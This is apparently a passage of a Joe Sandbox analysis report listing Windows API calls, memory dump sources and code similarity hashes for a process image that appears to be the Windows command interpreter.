7ff6e942c872-7ff6e942c8aa call 7ff6e943855c call 
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ConsoleTitlewcschr
• String ID: /$:
• API String ID: 2364928044-4222935259
• Opcode ID: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
• Instruction ID: 3b65508ac54dbcb4e04fa3d5721c1d3f1109bae1e62d701170a327c3cbfcd00e
• Opcode Fuzzy Hash: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
• Instruction Fuzzy Hash: 5BC1BE63A18642C1EB249F25D418BB962A1FF91B92F449171E91EC72D1EF3EE44CC30A

Control-flow Graph [figure: basic-block edge list; legend: Executed / Not Executed]
APIs
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
• String ID:
• API String ID: 4291973834-0
• Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
• Instruction ID: adab6265ae4a29c8c6ccc5543bd00b57ccb5e00530c78f71391e53dde17dff2c
• Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
• Instruction Fuzzy Hash: 3A41E433A08603C2FB51EFB0E8493B9A2A0AF54744F444435D91DC76A0DF7EE888C74A

Control-flow Graph [figure: basic-block edge list; legend: Executed / Not Executed]
APIs
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: memset$DriveErrorInformationLastTypeVolume
• String ID:
• API String ID: 850181435-0
• Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
• Instruction ID: 9869fed1b54958058e6ae6fa7301d9dbe810692da2740397c7b43acf6dad0e59
• Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
• Instruction Fuzzy Hash: 93411633608AC1CAEB618F60D8443ED77A4FF89B44F454525DA4D8BB48CF39D649C705

Control-flow Graph [figure: basic-block edge list; legend: Executed / Not Executed]
APIs
• GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
• memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
• FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
• String ID:
• API String ID: 1623332820-0
• Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
• Instruction ID: d0acba7e7af0887daf801d4dc27b919591d77bf1a94f0ef43a3c8f548b21199e
• Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
• Instruction Fuzzy Hash: 28118F22A18746C2DA10EF61A408279BBE0EF89F80F599134DE4E43754DE3EE449C745
APIs
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
• String ID:
• API String ID: 1826527819-0
• Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
• Instruction ID: 33dcd725dfd6ba19a70528e4b2f2c4f862f578f45f21f12e5bf1576d4c302d1b
• Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
• Instruction Fuzzy Hash: 13016132908642CAE700AF65A4443B9BE60FF8A751F445130E94F823A6DF3E904CC70A

APIs
  • Part of subcall function 00007FF6E9431EA0: wcschr.MSVCRT(?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6E9450D54), ref: 00007FF6E9431EB3
• SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6E94292AC), ref: 00007FF6E94330CA
• SetErrorMode.KERNELBASE ref: 00007FF6E94330DD
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E94330F6
• SetErrorMode.KERNELBASE ref: 00007FF6E9433106
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ErrorMode$FullNamePathwcschr
• String ID:
• API String ID: 1464828906-0
• Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
• Instruction ID: e26a49c189464e09b4f1fc88958a73b3d0ae1077cdee4c8a0abc078360e3db1d
• Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
• Instruction Fuzzy Hash: 70310323A08655C3EB24DF75A40827EB660EF59B94F949134DE4AC33D0DE7FA849C30A

Similarity
• API ID: memset
• String ID: onecore\base\cmd\maxpathawarestring.cpp
• API String ID: 2221118986-3416068913
• Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
• Instruction ID: adc56153d8a4f5a917308771b6521df14ffb690cace7d28b55b40f4fcb9fda6e
• Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
• Instruction Fuzzy Hash: 3111C223A08642C1EB54CF65E1547B92290AF88BA4F184331EE6DCB7D5DE3ED488C309

Similarity
• API ID: memsetwcschr
• String ID: 2$COMSPEC
• API String ID: 1764819092-1738800741
• Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
• Instruction ID: 3a5bf441f305daf567a70258dc4e0215cee3d97320fecd91dfc8596b65f84f32
• Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
• Instruction Fuzzy Hash: 84513823E08642C5FBA59F25A4513792299BF86B84F084031DA4DCB6D6DE7EE84CC74B

Similarity
• API ID: wcschr$ErrorFileFindFirstLastwcsrchr
• String ID:
• API String ID: 4254246844-0
• Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
• Instruction ID: 12b563f7c100edb412fb752c3c066078e3a9841c1448a9ce836a221fd10ed234
• Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
• Instruction Fuzzy Hash: 76418C23A09742D6EA20DF30E44837967A0EF99B84F548530DE4E87785EE3EE449C70A

Similarity
• API ID: Heap$EnvironmentFreeProcessVariable
• String ID:
• API String ID: 2643372051-0
• Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
• Instruction ID: 625702563c9d8f7f67a4f7f72ccef8d95b4b5ddbbd47fb0f7ebcc28dbd2154a0
• Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
• Instruction Fuzzy Hash: DAF086B3A19B46C5EB049F75F4442796AE1FF5E7A0B459234C92E83391EE3D944CC305

Similarity
• API ID: _get_osfhandle$ConsoleMode
• String ID:
• API String ID: 1591002910-0
• Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
• Instruction ID: c8a2111804c62b25ae75e43f098399c7c2e4dab27355f7f5b984c129ebbbac2a
• Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
• Instruction Fuzzy Hash: 63F062B6A19702CBE7148F50E8552787BA0FF8E711B444135C90A83321DE3EA40DCB0A
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DriveType
                                                                                                                                                                        • String ID: :
                                                                                                                                                                        • API String ID: 338552980-336475711
                                                                                                                                                                        • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                        • Instruction ID: a7bed3ff1cc0aaa4c24b84637877993dfc0e89d169c3b78b9a0e391ea8c7ca19
                                                                                                                                                                        • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9AE06D67618641C7E7209FA0E4511AAB7A0FF8D748F841529EA8D83724DF3CD249CB0D
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE ref: 00007FF6E9435B52
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E9434297
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E94342D7
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: memset.MSVCRT ref: 00007FF6E94342FD
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: memset.MSVCRT ref: 00007FF6E9434368
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E9434380
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: wcsrchr.MSVCRT ref: 00007FF6E94343E6
                                                                                                                                                                          • Part of subcall function 00007FF6E9434224: lstrcmpW.KERNELBASE ref: 00007FF6E9434401
                                                                                                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6E9435BC7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 497088868-0
                                                                                                                                                                        • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                        • Instruction ID: 63002f12f2f45b4917f73905c18553c902de97b199cf968fb5253802e7cd9eab
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                        • Instruction Fuzzy Hash: B8318222A1C642C2FA24EF31A4547BD6291BF89BC0F445431E94EC7B95DE3EE549C70A
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindClose.KERNELBASE(?,?,?,00007FF6E944EAC5,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9433A56
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFind
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                                                        • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                                                                                        • Instruction ID: 9a32c0faa4a013506eb30940c3d63769933f824296014b4f143df863f20a6a7a
                                                                                                                                                                        • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                                                                                        • Instruction Fuzzy Hash: FB01D672E28643D6E714CF75A45433966A0EF84F40F909630D90DC3645DE2EF589C309
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1412018758-0
                                                                                                                                                                        • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                        • Instruction ID: 24e90ddcdf1cbd5e8fc324478c14a78bb300ceec2ecef5aad7b76efbb486a78c
                                                                                                                                                                        • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                        • Instruction Fuzzy Hash: 2AE09203F6A34BD1FF14BFB2684A37812505F18741F081530CD0D85382EE2EA09DC31A
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                        • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                        • Instruction ID: afb262c4e7b4d1f789f5894ebf3d42889458b3332480acb6b90621e7e466b21c
                                                                                                                                                                        • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                        • Instruction Fuzzy Hash: A8F01973E28642C6EB148F15F84067CBBA1FF89B41B589534D90E83365DF3EA449C709
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: exit
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2483651598-0
                                                                                                                                                                        • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                        • Instruction ID: 1cf6ec1911cf339355e8538ecfa94cb2b605629a0706ab535107191b69e0917c
                                                                                                                                                                        • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                        • Instruction Fuzzy Hash: 91C0803270464AC7EF1CEF7124651BD15545F08301F05543CC907C1382DE2DD40CC709
APIs
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: DefaultUser
• String ID:
• API String ID: 3358694519-0
APIs
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447F44
• _get_osfhandle.MSVCRT ref: 00007FF6E9447F5C
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447F9E
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9447FFF
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448020
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448036
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448061
• RtlFreeHeap.NTDLL ref: 00007FF6E9448075
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E94480D6
• RtlFreeHeap.NTDLL ref: 00007FF6E94480EA
• _wcsnicmp.MSVCRT ref: 00007FF6E9448177
• _wcsnicmp.MSVCRT ref: 00007FF6E944819A
• _wcsnicmp.MSVCRT ref: 00007FF6E94481BD
• _wcsnicmp.MSVCRT ref: 00007FF6E94481DC
• _wcsnicmp.MSVCRT ref: 00007FF6E94481FB
• _wcsnicmp.MSVCRT ref: 00007FF6E944821A
• _wcsnicmp.MSVCRT ref: 00007FF6E9448239
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6E9448291
